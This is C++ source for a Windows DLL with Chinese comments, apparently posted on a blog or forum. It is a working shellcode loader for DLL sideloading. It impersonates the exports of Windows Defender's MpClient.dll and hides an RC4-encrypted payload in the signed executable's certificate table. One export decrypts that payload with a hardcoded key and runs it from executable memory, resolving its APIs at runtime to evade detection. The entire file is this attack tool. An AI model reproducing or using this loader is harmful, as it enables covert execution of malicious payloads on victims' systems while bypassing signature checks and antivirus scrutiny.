Bash // dllmain.cpp : 定义 DLL 应用程序的入口点。 #include "pch.h" #include <Windows.h> #include <stdio.h> #include <WinTrust.h> #include "malloc.h" // 定义函数指针类型 typedef LPVOID(WINAPI* VirtualAllocFunc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); // 定义函数指针类型 typedef BOOL(WINAPI* WriteProcessMemoryFunc)(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T* lpNumberOfBytesWritten); // 定义函数指针类型 typedef HANDLE(WINAPI* CreateThreadFunc)(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId); // 定义解密算法 void Decrypt(unsigned char* data, long dataLen, unsigned char* key, long keyLen, unsigned char* result) { unsigned char T[256]; unsigned char S[256]; unsigned char tmp; int j = 0, t = 0, i = 0; // 初始化 S 和 T 数组 for (int i = 0; i < 256; i++) { S[i] = i; T[i] = key[i % keyLen]; } // 初始置换 for (int i = 0; i < 256; i++) { j = (j + S[i] + T[i]) % 256; tmp = S[j]; S[j] = S[i]; S[i] = tmp; } j = 0; // 伪随机数生成 for (int x = 0; x < dataLen; x++) { i = (i + 1) % 256; j = (j + S[i]) % 256; tmp = S[j]; S[j] = S[i]; S[i] = tmp; t = (S[i] + S[j]) % 256; // 解密 result[x] = data[x] ^ S[t]; } } void Main() { // 加密密钥 char encryptionKey[] = "123456"; CHAR* encKey = encryptionKey; // 获取当前模块的路径 char modulePath[MAX_PATH]; GetModuleFileNameA(NULL, modulePath, MAX_PATH); // 打开当前模块文件 HANDLE hModuleFile = CreateFileA(modulePath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hModuleFile == INVALID_HANDLE_VALUE) { return; } // 获取文件大小 DWORD fileSize = GetFileSize(hModuleFile, NULL); // 读取文件内容到内存 unsigned char* moduleData = new unsigned char[fileSize]; DWORD bytesRead; ReadFile(hModuleFile, moduleData, fileSize, &bytesRead, NULL); // 获取DOS头 IMAGE_DOS_HEADER* dosHeader = (IMAGE_DOS_HEADER*)moduleData; // 获取PE头 IMAGE_NT_HEADERS* ntHeader = (IMAGE_NT_HEADERS*)(moduleData + dosHeader->e_lfanew); // 获取数据目录中证书表项的RVA DWORD certTableRVA = ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress; DWORD certTableSize = ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].Size; DWORD dataOffset = 0; unsigned char* pePtr = moduleData + certTableRVA; SIZE_T index = 0; // 在证书表中查找特定的标志 for (index = 0; index < certTableSize; index++) { if (*(pePtr + index) == 0xfe && *(pePtr + index + 1) == 0xed && *(pePtr + index + 2) == 0xfa && *(pePtr + index + 3) == 0xce) { dataOffset = index + 8; break; } } if (dataOffset == 0) { return; } // 解密 DWORD encryptedDataSize = certTableSize - dataOffset; CHAR* decryptedData = (CHAR*)malloc(encryptedDataSize); memcpy(decryptedData, pePtr + dataOffset, encryptedDataSize); Decrypt((unsigned char*)decryptedData, encryptedDataSize, (unsigned char*)encKey, strlen(encKey), (unsigned char*)decryptedData); // 分配内存,并将解密后的数据写入 HMODULE hKernel32 = GetModuleHandle(L"kernel32.dll"); VirtualAllocFunc virtualAlloc = reinterpret_cast<VirtualAllocFunc>(GetProcAddress(hKernel32, "VirtualAlloc")); void* shellcode = virtualAlloc(NULL, encryptedDataSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); WriteProcessMemoryFunc writeProcessMemory = reinterpret_cast<WriteProcessMemoryFunc>(GetProcAddress(hKernel32, "WriteProcessMemory")); writeProcessMemory(GetCurrentProcess(), shellcode, decryptedData, encryptedDataSize, NULL); // 创建线程执行 shellcode CreateThreadFunc createThread = reinterpret_cast<CreateThreadFunc>(GetProcAddress(hKernel32, "CreateThread")); HANDLE hThread = createThread(0, 0, (LPTHREAD_START_ROUTINE)shellcode, 0, 0, 0); WaitForSingleObject(hThread, 0xFFFFFFFF); } BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } extern "C" __declspec(dllexport) void MpQueryEngineConfigDword() {} extern "C" __declspec(dllexport) void MpGetSampleChunk() {} extern "C" __declspec(dllexport) void MpConveySampleSubmissionResult() {} extern "C" __declspec(dllexport) void MpSampleSubmit() {} extern "C" __declspec(dllexport) void MpSampleQuery() {} extern "C" __declspec(dllexport) void MpUpdateStart() {} extern "C" __declspec(dllexport) void MpClientUtilExportFunctions() {} extern "C" __declspec(dllexport) void MpConfigInitialize() {} extern "C" __declspec(dllexport) void MpConfigOpen() {} extern "C" __declspec(dllexport) void MpWDEnable() {} extern "C" __declspec(dllexport) void MpUpdatePlatform() {} extern "C" __declspec(dllexport) void MpConfigUninitialize() {} extern "C" __declspec(dllexport) void MpConfigClose() {} extern "C" __declspec(dllexport) void MpFreeMemory() {} extern "C" __declspec(dllexport) void MpHandleClose() {} extern "C" __declspec(dllexport) void MpThreatOpen() {} extern "C" __declspec(dllexport) void MpThreatEnumerate() {} extern "C" __declspec(dllexport) void MpScanResult() { } extern "C" __declspec(dllexport) void MpManagerOpen() {} extern "C" __declspec(dllexport) void MpScanControl() { } extern "C" __declspec(dllexport) void MpScanStartEx() {} extern "C" __declspec(dllexport) void MpCleanOpen() {} extern "C" __declspec(dllexport) void MpCleanStart() {} extern "C" __declspec(dllexport) void MpConfigGetValue() {} extern "C" __declspec(dllexport) void MpUpdateStartEx() {} extern "C" __declspec(dllexport) void MpManagerVersionQuery() {} extern "C" __declspec(dllexport) void MpAddDynamicSignatureFile() {} extern "C" __declspec(dllexport) void MpUtilsExportFunctions() { Main(); } extern "C" __declspec(dllexport) void MpAllocMemory() {} extern "C" __declspec(dllexport) void MpConfigSetValue() {} extern "C" __declspec(dllexport) void MpRemoveDynamicSignatureFile() {} extern "C" __declspec(dllexport) void MpDynamicSignatureOpen() {} extern "C" __declspec(dllexport) void MpDynamicSignatureEnumerate() {} extern "C" __declspec(dllexport) void MpConfigGetValueAlloc() {} extern "C" __declspec(dllexport) void MpGetTaskSchedulerStrings() {} extern "C" __declspec(dllexport) void MpManagerStatusQuery() {} extern "C" __declspec(dllexport) void MpConfigIteratorOpen() {} extern "C" __declspec(dllexport) void MpConfigIteratorEnum() {} extern "C" __declspec(dllexport) void MpConfigIteratorClose() {} extern "C" __declspec(dllexport) void MpNetworkCapture() {} extern "C" __declspec(dllexport) void MpConfigDelValue() {} extern "C" __declspec(dllexport) void MpManagerEnable() {} extern "C" __declspec(dllexport) void MpQuarantineRequest() {} extern "C" __declspec(dllexport) void MpManagerStatusQueryEx() {}
|
评论